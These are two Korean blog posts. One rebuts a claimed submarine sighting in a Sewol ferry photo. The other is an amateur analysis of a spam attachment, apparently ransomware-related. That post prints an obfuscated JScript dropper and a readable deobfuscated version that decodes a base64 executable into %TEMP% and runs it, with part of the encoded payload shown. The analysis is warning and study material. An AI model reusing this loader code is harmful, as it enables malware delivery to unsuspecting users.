'분석' 태그의 글 목록

« » 2025.5
일	월	화	수	목	금	토
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30	31

'분석'에 해당되는 글 2건

2016.12.31 세월호 - 잠수함 포착?
2016.07.23 스펨 메일의 정체 분석

세월호 - 잠수함 포착?

카테고리 없음 / 2016. 12. 31. 07:53

유튜브에 종종 나오는 사진입니다.
게시자는 자진 삭제하시는게 좋겠습니다.

1) 초 미니 잠수함인가?
저 정도 크기면, 사람이 탈 수 는 있을까?
저 작은 잠수함이 큰 배를 넘어뜨릴 수 있을까?
2) 헬기는 눈 뜬 장님인가?
헬기가 3대나 있었는데...
3) 충돌 각도를 보면, 세월호 바닥에 꽂혔어야 한다.
잠수함 앞머리 길이를 감안하면, 바닥을 뚫고 들어가야 한다.
4) 어떻게 저 각도로 충돌했을까?
바닥에 잠수함 구멍 났겠네.
구멍나면, 바로 침몰해야 정상임.
도저히 저 각도로는 충돌 할 수 없음.
넘어진 세월호에 부딪히지 않는 이상.
5) 잠수함은 배하고 사고로 충돌하면, 대부분 전망탑이라고 하는, 위로 튀어나온 부분이 배와 충돌합니다.
사진은 잠수함이 머리 내밀고 가다가 배 밑바닥 뚫고 들어간것.(말도 안되는)
6) 배 밑바닥 뚫고 들어 가려면, 잠수함이 최고 속도로 충돌해야함.(그래도 될까 말까)
7) 바닥에 흠집도 없네요???

저기 자국 같은게 무엇인지 궁금하면, 직접찾아보세요.
잠수함 의심 사진은 각종 부유물이, 저렇게 보였을 뿐입니다.

저 시간대에는 헬기가 3대나 있었습니다.
잠수함 못볼 수 가 없습니다.
게시물 내려주세요.

오른쪽 작은 주황색이 잠수함이라고 주장하시는 분이 계시는데, 세월호가 왼쪽으로 넘어지면서 떨어뜨린 콘테이너들입니다.

2016.12.31일 지금 중요한건, 박근혜일당 탄핵입니다.

----------------------------------------------------

2017년3월27일

자로는 세월호 인양 작업이 한창인 지난 24일 자신의 페이스북을 통해 “세월호 인양을 조용히 지켜보고 있다”, “세상에서 가장 힘든 일 중 하나가 ”조용히 지켜보는 것“이 아닌가 싶다.부디 진실이 떠오르기를”이라는 문구를 통해 심경을 전했다. 이후 세월호 밑바닥과 좌현에 충돌의 흔적이 없는 것으로 파악된 직후부터 SNS에 게시물이 올라오지 않고 있다. 27일 오전 7시 현재까지 자로의 페이스북 계정에 새로운 내용은 추가되지 않았다.

저작자표시 비영리 변경금지

Posted by 안녕1999

, |

스펨 메일의 정체 분석

카테고리 없음 / 2016. 7. 23. 01:00

요즘 회사메일로 스펨메일이 많이 오고 있다.

스펨등록을 해도 소용이 없다. 매번 다른 메일주소로 날라오니...

너무 많이 오는통에, 짜증이나서,

이 쓰레기같은 메일이 무엇인지 분석해보았다.

첨부파일은 압축파일이며,

압축파일 안에는 자바스크립트 파일이 들어 있다.

자바스크립트파일은 메모장에서도 편집이 가능하다.

var ZYb = " 321" + "";

var KXi6 = "Run" + "";

var Ts = "in" + "";

var Gf9 = ".b" + "";

var Nk2 = "xe" + "";

var ZQl = ".e" + "";

function YPp4(Qp){return Qp;};var FGi3 = "l" + "";

var Pg6 = "ESv" + "";

var ELz = "K2DPj" + "";

function Fw5(NGi){return NGi;};var Yh7 = "%/" + "";

var PEl = "MP" + "";

var Hm = "%TE" + "";

function So4(XUz3){return XUz3;};var Gj = "l" + "";

var Dv8 = "Shel" + "";

var Uq = "pt." + "";

var YBh = "WScri" + "";

(생략)

var v_bin = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAA

Byd01o5gz0vfxXl3DacBcKAAAM9JWvsaeyBL39oHJffNj7F6LwjPS9/G5+91gzYvCMwVI5FEAM9L38YvC

/1g2uAgAAa8ARM8Mz21OJRfj/FeT4QAD/1ovw/9cD8P/Xi038A8YxRfgz0oHJu7fc0WoEWPfxM9K5fvyty

BACU9m57XofjjQQAzRZwFfGFRqjPA99A10Gx46PfQjQC4pdhO1VCPhWD///+4UtQ2Bf915I+FWP///+h

6iQ/g6MGH/OLHRxBbZ1XYj1SZ9grtGMkROxWRLV0V3b/XmTqmd0F86fNumVTqOJOjb15Ufh8rFM2OF

(생략)

var WUc6 = 1

var BMd = (8330 - 8330)

var VKb = (-6867 + 6869)

var WMg4 = (9211 - 9210)

function UBb2(Rl, Nh8) {

var TYp = WScript[Op + Gu + Tz]((function Ex9(){return VAg;}()) + DNx2 + NLp + Ke5 + PQo8 + Ki + KDm6);

var UQp = TYp[CYr + ALc + (function FSn(){return RCm6;}())](Rl);

var Pe0 = UQp[GRq + GHc + TXp + (function XTm4(){return Gf;}())](WUc6, BMd);

var Zn = WScript[SSz0(Op) + (function By(){return Gu;}()) + Tz](Pr + Km + Io + Cj + Sb + UTx);

var KBc3 = Zn[AJc5 + Vi8 + ZOa2(Vk) + UGy](Ci0 + Gl + DUt8);

KBc3[Vf + Vv] = "bin.base64";

KBc3[AJh8] = Pe0[Ra9(RDj) + Io0(Za9)]();

var CFt2 = WScript[Op + Gu + Tz](APa7 + Vi2 + (function OBc8(){return Oi8;}()) + JQd + WPi8(XTq));

CFt2[AZl4] = WMg4;

CFt2[YVm + (function LKz6(){return TPz;}())]();

CFt2[FHb7 + EFk](KBc3[Lr4 + Gn4 + Px + Yy + WRr]);

CFt2[Pw5 + Me + SPa2 + CBe](Nh8, VKb);

Pe0[Mk]();

CFt2[Mk]();

}

function Vx5(QFk, Nh8)

{

var Og, NKj, QGj8

var PDt2 = 31 - 30, AWl3 = 2;

Og = new ActiveXObject(VAg + DNx2 + NLp + Ke5 + PQo8 + Ki + KDm6)

NKj = Og[HXi5 + (function VPk1(){return Nb0;}()) + BIy3 + Kh4](Nh8, AWl3, true)

NKj[FHb7 + EFk](QFk);

NKj[Mk]();

NKj = Og[Em9(HXi5) + Nb0 + BIy3 + Kh4](Nh8, PDt2);

QGj8 = NKj[IBc + Yb1 + Nf8]();

return(QGj8);

}

var EQl7=WScript[Op + OXk7(Gu) + Tz]((function WQg(){return YBh;}()) + Uq + Dv8 + So4(Gj));

var HHo3=EQl7.ExpandEnvironmentStrings(Hm + Fw5(PEl) + (function At(){return Yh7;}()));

var Gw5=HHo3 + ELz + YPp4(Pg6) + FGi3;

var RZh4=Gw5 + ZQl + Nk2;

var v_binpath=RZh4+Gf9+Ts;

try {

Vx5(v_bin, v_binpath);

UBb2(v_binpath, RZh4);

//EQl7[KXi6](RZh4 + ZYb);

}

catch (e) {WScript.Quit(1);};

WScript.Quit(0);

자바스크립트는 위와 같이 암호화 되어 있다.

var v_bin = "TVqQAAMAAAAEAAAA..."

이 내용은 Base64라는 코딩 방식이며, 내용물은 실행파일이 들어 있다.

스크립트문을 풀어보면

function Base64_to_bin_file(Rl, Nh8) {

var TYp = WScript["CreateObject"]("Scripting.FileSystemObject");

var UQp = TYp["GetFile"](Rl);

var Pe0 = UQp["OpenAsTextStream"](1, 0);

var Zn = WScript["CreateObject"]("MSXml2.DOMDocument");

var KBc3 = Zn["createElement"]("Base64Data");

KBc3["dataType"] = "bin.base64";

KBc3["text"] = Pe0["ReadAll"]();

var CFt2 = WScript["CreateObject"]("ADODB.Stream");

CFt2["Type"] = 1;

CFt2["Open"]();

CFt2["Write"](KBc3["nodeTypedValue"]);

CFt2["SaveToFile"](Nh8, 2);

Pe0["Close"]();

CFt2["Close"]();

}

function Create_K2DPjESvl_exe(QFk, Nh8)

{

var Og, NKj, QGj8

Og = new ActiveXObject("Scripting.FileSystemObject")

NKj = Og["OpenTextFile"](Nh8, 2, true)

NKj["Write"](QFk);

NKj["Close"]();

NKj = Og["OpenTextFile"](Nh8, 1);

QGj8 = NKj["ReadLine"]();

return(QGj8);

}

var EQl7=WScript["CreateObject"]("WScript.Shell");

var v_binpath=EQl7.ExpandEnvironmentStrings("%TEMP%/") + "K2DPjESvl.exe.bin";

try {

Create_K2DPjESvl_exe(v_bin, v_binpath);

Base64_to_bin_file(v_binpath, EQl7.ExpandEnvironmentStrings("%TEMP%/") + "K2DPjESvl.exe");

EQl7["Run"](EQl7.ExpandEnvironmentStrings("%TEMP%/") + "K2DPjESvl.exe 321");

}

catch (e) {WScript.Quit(1);};

WScript.Quit(0);

위와 같이 아주 간단한 내용이다.

var v_bin = "TVqQAAMAAAAEAAAA..."

이내용을 파일로 저장하고, 다시 읽어서, Base64로 실행파일로 저장한 다음, 실행한다.

메일을 받은 사람이 자바스크립트 파일을 열어보는 순간, 자바스크립트가 실행되어,

실행파일을 생성하고, 실행파일을 동작시킨다.

(메모장으로 열때는 편집만 된다. 실행은 안된다.)

그러나 실수로, 인터넷 익스플로어로 열게되면, 자바스크립트가 실행된다.

실행파일의 내용은 시간관계상 분석 못한다.

관심있는분이 분석해주시면 감사하겠습니다.

INV000 b1a7.js(바이러스).zip

위 파일에는 내가 메일로 받은 파일이 들어있다.

안전을 위해, 파일확장자를 txt로 바꾸었으니, 실행되지는 않는다.

또한, 안전을 위해, 실행파일을 실행하는 명령은 주석처리가 되어 있다.

받아서, 메모장으로 열어봐도 문제는 없다.

보나마나 뻔한게, 랜섬웨어일 가능성이 높다.

요즘 돈되는건 랜섬웨어가 최고이니...

랜섬웨어는 하드디스크의 파일을 암호화시키고, 돈을 요구하는 프로그램이다.

돈 안주면, 파일 복구못한다.

마지막 실행문장은 제거후, 자바스크립트를 실행해서, 실행파일을 생성했다.

실행파일은 %TEMP%폴더에 생성된다.

윈도우 탐색기 주소창에 넣으면, 해당 폴더로 이동한다.

실행파일의 정보는 위와 같다.

실행파일이 사용하는 함수는 위와 같다. 177k의 비교적 작은 크기임에도, 온갖 종류의 기능은 다 사용하는듯 하다.

아마, 한번 실행되면, 여기저기 복사본을 만들듯 싶다.

스펨광고창부터, 랜섬웨어 기능까지...(추측)

www.hybrid-analysis.com

멜웨어, 바이러스등을 무료로, 자동으로 분석해주는 사이트이다.

분석결과는 "잘 모르겠음" ㅎㅎ(예상한대로)

https://www.hybrid-analysis.com/sample/0ae741fbcae6fb5af7bdec6e8219d02b522e74ac20906703b2573e14d1101252?environmentId=100

가상PC에서 직접 실행하면서 분석하기도 하나봅니다.

프로그램이라는게, 실행파일이 되면, 기계어코드만 남기때문에, 해당 코드가 무슨 목적으로 동작하는지 분석하기는 쉽지 않습니다.

해당 프로그램이 어떤 함수들을 호출하더라...는 정보로, 대충, 이럴것이다.

좀더 의심이 가면, 하나씩 분석을하게되면, 시간이 상당히 오래걸립니다.

제거 보기에는 이 프로그램은 암호화 기능을 사용해서, 랜덤하게 프로그램 코드를 생성하는듯 싶습니다.

그래야 백신프로그램도 잘 못잡거든요.

어쨌든, 전 시간이 없어, 더이상은 못합니다.

관심있으신분들 한번 분석해보시기 바랍니다.

안랩 랜섬웨어예방 - ahnlab.com‎
광고www.ahnlab.com/‎
최신 랜섬웨어 정보부터 피해 예방 가이드, 전용 백신까지!
한국을 목표로 한 랜섬웨어, CryptoLocker 상세정보

검색결과

랜섬웨어에 감염되어 암호화 된 파일은 복호화 키가 없으면 복구가 불가능하다. 따라서 중요한 사용자 문서나 데이터들은 물리적으로 분리된 저장소에 정기적으로 백업해두는 습관을 길러 악성코드에 감염되더라도 피해를 최소화 할 수 있도록 해야 한다.2015. 11. 4.